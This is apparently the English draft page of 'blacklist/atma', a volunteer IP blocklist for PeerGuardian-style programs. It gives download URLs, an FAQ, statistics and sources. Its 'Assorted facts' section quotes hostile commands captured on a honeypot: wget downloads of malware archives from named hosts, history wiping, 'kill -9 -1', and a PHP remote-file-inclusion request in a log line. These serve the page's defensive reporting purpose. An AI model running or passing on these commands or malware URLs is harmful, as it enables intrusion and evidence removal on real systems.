Mission 

We identify, gather and clasify dangerous IP addresses such as:

• Attackers who try to spy or remotely control others' computers by means such Microsoft remote terminal, SSH, Telnet or shared desktops.

• Threats for email servers or users: spiders/bots, account hijacking, etc.

• Sites spreading virus, trojans, spyware, etc. or just being used by them to let their authors know that a new computer has been infected.

• Threats for servers: exploits, fake identities/agents, DDoS attackers, etc.

• Port scans, which are the first step towards more dangerous actions.

• Malicious P2P sharers or bad peers who spread malware, inject bad traffic or share fake archives.

An updated list is published each 3-4 days, ready to be used with any blocking program. All you need to do is adding it to your favourite program by using one of the URLs below:

http://www.atma.es/atma.p2p

http://www.ataca.me/atma.p2p

http://galinux.myftp.org/atma.p2p

http://list.iblocklist.com/?list=tzmtqbbsgbtfxainogvm   (Gz compressed)

Documentation 

How-to 

  Peerguardian 2 for Windows       IPlist/IPblock 0.26 for Linux

 

FAQ

How can I use the blacklist/atma deny list?

Most blocking programs come with a few pre-configured lists. Unfortunately, blacklist/atma is not in that number as far as we know. Thus, you need to configure your blocking program. While being an easy task in every case, there are no universal instructions valid for all of them. Our list is published in Peerguardian 1 format, which is compatible with nearly all existant programs and human readable "as is". If you are not using a blocking program yet, please go to the downloads section.

Concerning the terms of use, feel free to use it for any purpose as long as you keep the notice in its header (comments in the first lines of the list) or giving credit in any other fair way instead. If in doubt, please contact us.

Why should I use this list when my program of choice already comes with some others preconfigured?

Mainly for a reason alone: we do believe that we identify a good deal of them not listed anywhere else before. This is how we try to do it::

1. We identify most dangerous IPs with our own tools which are not based in any other. They are supposed to be harder to avoid cause attackers don't know how they work, even if they know about their existance at all. More, they can't know where we are lurking because we use dynamic IPs. In other words, when a threat is detected, the attacker will find its IP published within some 50 hours but we will have changed ours before, so there will be no use for them in reviewing hundreds of logs or warning other attackers.
   
2. We are spanish language speakers and we use that language for almost everything we do: websites, mailing, programming... Most attackers either are native english speakers or have very good skills in that language, but it is not very likely that they could understand spanish. That's why they might be detected by us without even knowing how and where it happened.
   
3. As for now, we are a small group. If we intend to harvest a large number of attacks we just can not sit and wait for them to appear. Thus, we don't use passive detections but try to attract as many attacks as possible instead (obviously, we can't explain in detail how we do it).

Should I use this list alone or along with some others?

For one thing, the more lists you use, the slower your computer might run. On the other hand, despite we add IPs from other sources, it is always safer to block them from several lists, perhaps updated more often or being larger. What you should ask to yourself is: am I concerned with most of the threats that blacklist/atma deals with? We do believe that there are a wide variety of users that should use it, specially those using P2P and/or running any kind of server.

Bear in mind that we don't list IPs:

• About sex, ads, P2P trackers, etc. unless they explicitely pose any threat or risk.
• Some of the reserved IPs/ranges for local nets, testing, etc. listed in http://tools.ietf.org/html/rfc3330
• Belonging to the most used services, tools or companies: Google, Microsoft, Rapidshare, Yahoo and some others.
  (Please note that even a common search in Google could lead you to evilish sites, for instance)

If you want to block any of them, you definitevely need extra lists.

Will I get rid of antivirus, anty-spyware and firewalls?

Not at all. Using a blocking program along with our list or any other just prevents your computer to contact with some others. That's all. For instance, you still can get your computer infected by sharing a memory card or by opening an infected email, even if delivered by a trustworthy ISP.

Is atma/blacklist a widely used list?

We guess not, but we have no other reliable data than those of galinux.myftp.org. As a orientative fact, the list was downloaded more than 5000 times from there in january of 2010.

What do the descriptions mean?

When using a blocking program you will see different kinds of alerts. Those provided from our list fall into three main categories::

• Attacks which their target are HTTP/SQL/FTP/PHP servers
• Peers that spoil P2P or use it for spreading malware
• Other generic threats for most users and systems

Note this: each attack goes towards a specific target, but that doesn't mean that the attacker would refuse to take advantage of unexpected vulneravilities. Same here about operative systems: you could see an "SSH attack" alert and think "well, I'm running Windows, which does not use that stuff, so I'm safe". Wrong. We are saying to you that we have detected a SSH attack from that IP but it is very likey they could run other kinds of attacks.

Some items represent quite benign actions, such as port scans or pinging. On the contrary, those labeled as "Several threats" are the most dangerous.

Assorted facts

 Some SSH attacks:

Gathering information w uptime id ls -a uname -a cat /proc/cpuifno ps x wget curl -O After a previous succesful login rm -rf .bash_history history -c w ps x ls -a Attempting to get rid of the honeypot bash sh kill -9 -1 reboot exit

Sending malware to the target uname -a passwd wget http://nasa.undernet.nm.ru/udp.tgz tar zxvf udp.tgz Other deliveries came from dragutrau.clan.su/Trade/army.tar.gz freewebtown.com/hotzu/py/ryo.tar prigat.ucoz.com/mangalia.tgz Preparing /dev/shm to run malware unset HISTFILE HISTSAVE HISTLOG uname -a ls -a cd /dev/shm su

 Some flashy detections:

• Sharing fake files in Gnutella network from 65.55.102.24 (Microsoft Corporation), October 21th and November 1st of 2009..
• Port scan from 208.43.71.139 (Avast Antivirus) in September and October of 2009.
• Port scan from 69.48.241.84 (www.trustedsource.org, owned by McAfee Antivirus) in December 21th 2009.

Statistics of blocking programs downloading blacklist/atma during the first week of December o2009:

Downloads 760 253 112 43 14 7 4 4 2 1 Total 916 253 14 11

Program/Version PeerBlock/1.0.0.181 PeerGuardian/2.0 PeerBlock/1.0.0.202 PeerBlock/1.0.0.223 BlockControl/1.6.9 PeerBlock/0.9.2.86 IPblock/0.18 IPblock/0.27 IPblock/0.26 PeerBlock/1.0.0.187 Program PeerBlock PeerGuardian BlockControl IPblock

 During September of 2009 attackers tried to login under 10374 different user names. The most attacked were:

9850 1034 690 431 264 224 208 206 195 190

root admin test oracle user guest robert mysql michael paul

190 177 176 176 168 166 162 154 152 148

info postgres amanda adam sales martin backup student ftpuser suporte

132 130 130 130 126 126 124 120 115 114

testing nagios eric david web tester john richard sarah sam

114 110 107 106 104 102 101 100 100 100

patrick bruce matt mark cyrus teste marc webmaster mail download

    Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David" (a common name in both languages).

Bad boys never sleep:

2009, fall of the nigth of the 24th. While many countries are celebrating Christmas Eve, attackers were taking advantage of it. The most striking one detected by us was during that hours was a SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20.859 username + password combinations.

Wierd ways of figthting cybercrime:

Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

No comment .

Get involved 

1-Use and spread our list

Help us and help others letting them to know about us. You could link us from your blog or website, tell your contacts about atma.es... On the other hand, since downloads are steadily increasing, we would like to have the list (it is only 2-3 MB) mirrored in some more sites. If you are willing to setup one, please contact us.

2-Sending your logs to us

We have developed some automathic tools that collect, select, clasify and merge IPs from a variety of logs. If you think that some in your system could help us, please drop us a line. As for now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.

3-Reporting assosrted IPs/ranges

If you know how to identify them in a particular context you could report them to us.

4-Run a "honey pot"

You can think of a "honey pot " as a disguise that can turn your local net or computer into an absolutely different thing when seen from an attacker's point of view. Installing a basic one can be quite effective while easy to set up. If you need a little help, here we are!

5-Warn us about false positives, changed IPs, etc.

Sometimes we may be wrong and add some innocent IP to the list. But that is not the only one issue we have to face; for instance, we need to remove old entries when they have turned safe, to exchange lots of info, to deal with lots of emails... We will always welcome your help.

6-Special request for english speakers

This page in english is a draft yet. We would like you to help us by warning us about typos, wrong expressions and so.

Links 

Blocking programs for Microsoft Windows

PeerBlock   PeerGuardian

Blocking programs for Linux

IPBlock/IPList   MoBlock   PeerGuardian   NfBlock

Blocking programs for Mac-OS

PeerGuardian

If you know about any other not listed here, please tell us.

Third part sources

In our list we add the newest threats detected by other trustworthy sources:

MalwareDomainList.com	sshBL.org
ProjectHoneyPot.org	Sans.org
Twitter.com/olaf_j	DnsBL.abuse.ch
Antispam.Andreotti.nl	Twitter.com/HoneyPoint
Autoshun.org	MaliciousNetworks.org

Please, note that that we select IPs following our own criteria rather than automatically adding every single one from every source. That's why you could find IPs that are listed in some of them but missing in atma/blacklist.

Occasionally we also visit:

HoneyNet.cz     Cimsuyu.com     MalwareURL.com     Amos.TwilightParadox.com     Fugitif.DynDns.org     Lira.cis.upenn.edu     Smp.rnc.ro     Shinshu.fm/     Mtc.sri.com     Proxy1.twaren.net     Dr-data.net     Websworld.org     EmergingThreats.net     MalwarePatrol.net     ZeusTracker.abuse.ch     Cs.Rutgers.edu     StopForumSpam.com     Semeliker.net     Old-noritake.org     assurtis-tours.com     Danger.rulez.sk     Tcc.edu.tw     IPillion.com    

Contact 

Visit our Google group (spanish only) or send us an email.